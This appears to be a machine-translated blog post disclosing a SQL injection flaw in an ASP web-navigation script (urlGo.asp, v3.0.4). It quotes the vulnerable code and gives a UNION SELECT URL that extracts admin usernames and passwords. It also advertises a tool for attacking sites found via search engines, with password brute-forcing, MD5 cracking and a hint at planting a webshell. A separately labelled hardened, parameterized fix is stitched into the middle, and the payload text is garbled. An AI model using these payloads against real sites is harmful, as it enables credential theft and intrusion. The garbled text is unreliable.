Alimail love S Blog http://www.virusest.com/
Deep Learning (asp) web site navigation v3.0.4 SQL Injection Vulnerability
Problem code, urlGo.asp:
<!--#include file="connDB.asp"-->
<!--#include file="include/Function.Common.asp"-->
<%
id = Request.QueryString("id")
If id = "" Then
    Response.Redirect("/")
End If
'----- URL --------------
Set rsWebUrl = Server.CreateObject("Adodb.Recordset")
' id is concatenated into the SQL text without any validation
sqlC = "select * from tWebUrl where fpassed = 1 and fid =" & id
rsWebUrl.Open sqlC, conn, 0, 1
If rsWebUrl.EOF And rsWebUrl.BOF Then
    Response.Redirect("/")
Else
%>
Obviously, this file can be injected: id goes straight from the query string into the SQL statement. Due to the programmer's negligence, the file header does not call the anti-injection system, although the other files do call it.
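A hardened version of the lookup above, as an added example that is not part of the original post or the product's own code: it accepts only a digits-only id and binds it through an ADODB.Command parameter instead of concatenating it. It assumes connDB.asp exposes an open ADODB connection named conn (as the page's code does) and that fid is an integer column.

```asp
<!--#include file="connDB.asp"-->
<%
' Added example, not the project's code: hardened lookup for urlGo.asp.
' Assumptions: conn is an open ADODB.Connection from connDB.asp,
' and tWebUrl.fid is an integer column.
Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

Dim id, re, cmd, rsWebUrl
id = Trim(Request.QueryString("id"))

' Allow-list: 1 to 9 decimal digits only, so CLng() below cannot overflow.
' IsNumeric() is too loose for this; it accepts values such as "1e5" or "&H10".
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(id) Then
    Response.Redirect "/"
    Response.End
End If

' Parameterized query: id is bound as a typed value and is never
' spliced into the SQL text, so "union select ..." cannot change the statement.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "select * from tWebUrl where fpassed = 1 and fid = ?"
cmd.Parameters.Append cmd.CreateParameter("fid", adInteger, adParamInput, , CLng(id))

' Execute returns a forward-only, read-only recordset (same as Open ..., 0, 1)
Set rsWebUrl = cmd.Execute
If rsWebUrl.EOF And rsWebUrl.BOF Then
    Response.Redirect "/"
    Response.End
End If
' ... the rest of the page uses rsWebUrl as before ...
%>
```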
Usage: note that the injection point is not detected by the usual injection tools. Simply write the injection statement by hand:
Http: // localhost/urlGo. asp? Id = 4233% 20and % 201 = 2% 20 union % 20 select % ,,2, fusername, 10%, 20 from % 20 tAdmin
You only need to change fusername to fpassword to read the password. However, testing showed that the number of columns in the table may differ between versions. If the number of columns does not match, change it to 9.
Here, I wrote a tool for this, a silly intrusion, where the ID value is the ID seen in the search engine:
The tool integrates functions such as brute-forcing the account password, background access, and MD5 cracking for database downloads. For the tool and source code, see the attachment.
Not shelled. You are welcome to tamper with the copyright! I haven't written a program for a long time. Just be a trainer!
Ps: it is difficult to use Shell in the background, prompting the Shell database to restore it to the backup first, and then a sentence!